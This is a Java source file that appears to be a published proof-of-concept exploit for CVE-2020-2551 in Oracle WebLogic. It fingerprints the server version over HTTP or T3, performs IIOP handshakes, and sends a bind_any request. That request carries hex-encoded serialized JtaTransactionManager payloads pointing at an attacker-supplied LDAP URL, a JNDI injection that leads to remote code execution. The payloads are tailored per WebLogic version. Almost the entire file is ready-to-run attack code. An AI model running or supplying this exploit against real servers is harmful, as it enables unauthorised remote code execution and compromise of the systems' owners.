import cn.hutool.core.util.HexUtil;
import cn.hutool.core.util.ReUtil;
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/**
 * Title: NewPoc
 * Descrption: TODO
 * Date:2020/2/26 4:23 下午
 * Email:woo0nise@gmail.com
 * Company:www.r4v3zn.com
 *
 * @author R4v3zn
 * @version 1.0.0
 */
public class CVE_2020_2551 {

    public static void main(String[] args) throws Exception {
        String ip = "";
        int port = 7001;
        String ldapUrl = "";
        poc(ip,port,ldapUrl);
    }

    public static void poc(String ip, Integer port, String url) throws Exception {
        String version = getVersion(ip, port);
        System.out.println("weblogic version --> "+version);
        Socket socket = null;
        try {
            socket = new Socket(ip, port);
        } catch (IOException e) {
            System.out.println("vul error");
            return;
        }
        /* iiop == 1 */
        String nameServerMsg = "47494f50010200030000001700000002000000000000000b4e616d6553657276696365";
        byte[] nameServerByte = new byte[0];
        try {
            nameServerByte = sendSocket(nameServerMsg, socket);
        } catch (Exception e) {
            System.out.println("vul error");
            return;
        }
        String nameServerHex = binaryToHexString(nameServerByte);
        // get key
        String key = getKeyHex(nameServerHex, true);
        if("".equals(key)){
            return;
        }
        // 提取 NAT 网络 IP
        String iiopIp = "iiop://"+getIp(new String(nameServerByte));
        // key length
        String keyLength = addZeroForNum(Integer.toHexString(key.length()/2), 8);
        /* iiop == 2 */
        // op=_non_existent
        String newSend = "000000030300000000000000"+keyLength+key+"0000000e5f6e6f6e5f6578697374656e7400000000000006000000050000001800000000000000010000000a3132372e302e312e3100d80100000006000000f0000000000000002849444c3a6f6d672e6f72672f53656e64696e67436f6e746578742f436f6465426173653a312e30000000000100000000000000b4000102000000000a3132372e302e312e3100d8010000006400424541080103000000000100000000000000000000002849444c3a6f6d672e6f72672f53656e64696e67436f6e746578742f436f6465426173653a312e30000000000331320000000000014245412c000000100000000000000000171db96932f5c18300000001000000010000002c0000000000010020000000030001002000010001050100010001010000000003000101000001010905010001000000010000000c0000000000010020050100010000000f0000002000000000000000000000000000000001000000000000000001000000000000004245410000000005000c020103000000"+setIpHex(iiopIp);
        newSend = "47494f5001020000"+addZeroForNum(Integer.toHexString(newSend.length()/2),8)+newSend;
        byte[] existentByte = sendSocket(newSend, socket);
        // get new key
        String newKey = getKeyHex(binaryToHexString(existentByte), false);
        if(!"".equals(newKey) && newKey != null){
            key = newKey;
        }
        // key length
        keyLength = addZeroForNum(Integer.toHexString(key.length()/2), 8);
        /* iiop == 3 */
        // op=_non_existent
        newSend = "000000040300000000000000"+keyLength+key+"0000000e5f6e6f6e5f6578697374656e7400000000000001"+setIpHex(iiopIp);
        newSend = "47494f5001020000"+addZeroForNum(Integer.toHexString(newSend.length()/2),8)+newSend;
        sendSocket(newSend, socket);
        /* iiop == 4 */
        // op=bind_nay
        bindAny(key, keyLength, url, socket, version);
    }

    public static void bindAny(String key, String keyLength,String url, Socket socket, String version) throws Exception {
        String checkHex = "47494f50010200010000000d00000004000000000000000000";
        // header + length
        String header = "47494f5001020000" ;
        // request id
        String requestId = "00000005";
        // response flags
        String responseFlags = "03";
        // reserved
        String reserved = "000000";
        // target address
        String targetAddress = "0000"+"0000";
        // operation length + operation
        String operationLength = "0000000962696e645f616e7900";
        // body length
        String dataLength = addZeroForNum("",8);
        String serviceContextList = "00000000000000";
        String subData = "";
        String tmp = header+dataLength+requestId+responseFlags+reserved+targetAddress+keyLength+key+operationLength+serviceContextList;
        System.out.println("字节码余 --> "+(tmp.length()%16));
        String padding = "";
        int paddingCount = (tmp.length()%16)/2;
        // 计算填充字节码
        if (paddingCount > 0){
            for (int i = 0; i < paddingCount; i++ ) {
                padding += "00";
            }
        }
        serviceContextList += padding;
        String urlLength = addZeroForNum(Integer.toHexString(url.length()),8);
        if(version.contains("12.2.1.3")||version.contains("12.2.1.4")){
            /**
             * weblogic 12.2.1.3.0 版本 or weblogic 12.2.1.4.0 版本
             */
             subData = "000000010000000568656c6c6f00000000000001000000000000001d0000001c000000000000000100000000000000010000000000000000000000007fffff0200000074524d493a636f6d2e6265612e636f72652e72657061636b616765642e737072696e676672616d65776f726b2e7472616e73616374696f6e2e6a74612e4a74615472616e73616374696f6e4d616e616765723a413235363030344146343946393942343a3143464133393637334232343037324400ffffffff0001010000000000000001010101000000000000000000007fffff020000002349444c3a6f6d672e6f72672f434f5242412f57537472696e6756616c75653a312e300000";
        }else if(version.contains("10.3.6.0") || version.contains("12.1.3.0")){
            /*
            weblogic 10.3.6.0.0 版本 or weblogic 12.1.3.0.0 版本
             */
            subData += "000000010000000568656c6c6f00000000000001000000000000001d0000001c000000000000000100000000000000010000000000000000000000007fffff0200000074524d493a636f6d2e6265612e636f72652e72657061636b616765642e737072696e676672616d65776f726b2e7472616e73616374696f6e2e6a74612e4a74615472616e73616374696f6e4d616e616765723a304433303438453037423144334237423a3445463345434642423632383938324600ffffffff0001010000000000000001010100000000000000000000007fffff020000002349444c3a6f6d672e6f72672f434f5242412f57537472696e6756616c75653a312e300000";
        }else{
            System.out.println("vul error");
            return;
        }
        subData += addZeroForNum(Integer.toHexString(url.length()),8);
        subData += HexUtil.encodeHexStr(url);
        String body = requestId + responseFlags + reserved + targetAddress + keyLength + key + operationLength + serviceContextList + subData;
        header += (addZeroForNum(Integer.toHexString(body.length()/2),8)+body);
        byte[] bindAnyByte = sendSocket(header, socket);
        String bindAny = new  String(bindAnyByte);
        String bindAnyHex = binaryToHexString(bindAnyByte);
        if(bindAny.contains("omg.org/CORBA/MARSHAL:1.0") || checkHex.equals(bindAnyHex) || bindAny.contains("AlreadyBound")){
            System.out.println("vul ok");
        }else{
            System.out.println("vul error");
        }
    }

    /**
     * <p>
     *     get weblogic version
     *     First get reponse body
     *     Second get version element by Jsoup
     *     End get version by regex
     *     if get version return version data
     * </p>
     * @param url weblogic url
     * @return weblogic version
     */
    public static String getVersion(String ip, Integer port)  {
        String webLogicUrl = "http://"+ip+":"+port;
        String version = getVersionByHttp(webLogicUrl);
        if("".equals(version)){
            version = getVersionByT3(ip, port);
        }
        return version;
    }

    /**
     * 通过 HTTP 获取 weblogic 版本
     * @param url url
     * @return 版本号
     */
    public static String getVersionByHttp(String url){
        String version = "";
        url += "/console/login/LoginForm.jsp";
        try {
            Document doc = Jsoup.connect(url).get();
            String versionTmpStr = doc.getElementById("footerVersion").text();
            version = getVersion(versionTmpStr);
        } catch (Exception e) {
            version = "";
        }
        return version;
    }

    /**
     * 通过 T3 获取 weblogic 版本
     * @param ip ip
     * @param port 端口
     * @return 版本号
     */
    public static String getVersionByT3(String ip, Integer port) {
        String getVersionMsg = "74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a50553a74333a2f2f75732d6c2d627265656e733a373030310a0a";
        String version = "";
        try {
            Socket socket = new Socket(ip, port);
            byte[] rspByte = sendSocket(getVersionMsg, socket);
            socket.close();
            version = getVersion(new String(rspByte));
        } catch (Exception e) {
            version = "";
        }
        return version;
    }

    public static String getVersion(String content){
        content = content.replace("HELO:", "").replace(".false","").replace(".true", "");
        String getVersionRegex = "[\\d\\.]+";
        List<String> result = ReUtil.findAll(getVersionRegex, content, 0 , new ArrayList<String>());
        return  result != null && result.size() > 0 ? result.get(0) : "";
    }

    /**
     * 读取响应数据内容
     * @param sendMessage 发送内容
     * @param socket socket 链接
     * @return
     * @throws Exception
     */
    public static byte[] sendSocket(String sendMessage,Socket socket) throws Exception {
        OutputStream out = socket.getOutputStream();
        InputStream is = socket.getInputStream();
        out.write(hexStrToBinaryStr(sendMessage));
        out.flush();
        byte[] bytes = new byte[4096];
        int length = is.read(bytes);
        return Arrays.copyOfRange(bytes, 0,length);
    }

    public static String addZeroForNum(String str, int strLength) {
        int strLen = str.length();
        if (strLen < strLength) {
            while (strLen < strLength) {
                StringBuffer sb = new StringBuffer();
                sb.append("0").append(str);// 左补0
                // sb.append(str).append("0");//右补0
                str = sb.toString();
                strLen = str.length();
            }
        }
        return str;
    }

    /**
     * 提取响应内容中的host
     * @param content 响应内容信息
     * @return
     */
    public static String getIp(String content){
        Pattern p=Pattern.compile("https?://([\\w\\:.-]+)/");
        Matcher m=p.matcher(content);
        String ip = "";
        if(m.find()){
            ip = m.group(1);
        }
        return ip;
    }

    /**
     * 生成 IP hex码
     * @param ip ip地址
     * @return
     */
    public static String setIpHex(String ip){
        return "4245410e000000"+Integer.toHexString(ip.length()+9)+"00000000000000"+Integer.toHexString(ip.length()+1)+HexUtil.encodeHexStr(ip)+"00";
    }

    /**
     * 提取 key hex
     * @param rspHex 内容
     * @return key hex
     */
    public static String getKeyHex(String rspHex, final Boolean flag){
        String startHex = "00424541";
        int startIndex = -1;
        if(flag){
            startIndex = rspHex.indexOf(startHex);
        }else if(rspHex.contains("0000000300000000")){
            return null;
        }else{
            startIndex = rspHex.lastIndexOf(startHex);
        }
        if(startIndex != -1) {
            int keyLength = Integer.parseInt(rspHex.substring(startIndex-8, startIndex), 16);
            // 提取key
            return rspHex.substring(startIndex, startIndex + keyLength*2);
        }else{
            return null;
        }
    }

    /**
     * 二进制转换为十六进制
     * @param bytes byte数组
     * @return 16进制字符串
     */
    public static String binaryToHexString(byte[] bytes) {
        String hexStr = "0123456789abcdef";
        String result = "";
        String hex = "";
        for (byte b : bytes) {
            hex = String.valueOf(hexStr.charAt((b & 0xF0) >> 4));
            hex += String.valueOf(hexStr.charAt(b & 0x0F));
            result += hex + "";
        }
        return result;
    }

    public static byte[] hexStrToBinaryStr(String hexString) {
        hexString = hexString.replaceAll(" ", "");
        int len = hexString.length();
        int index = 0;
        byte[] bytes = new byte[len / 2];
        while (index < len) {
            String sub = hexString.substring(index, index + 2);
            bytes[index/2] = (byte)Integer.parseInt(sub,16);
            index += 2;
        }
        return bytes;
    }
}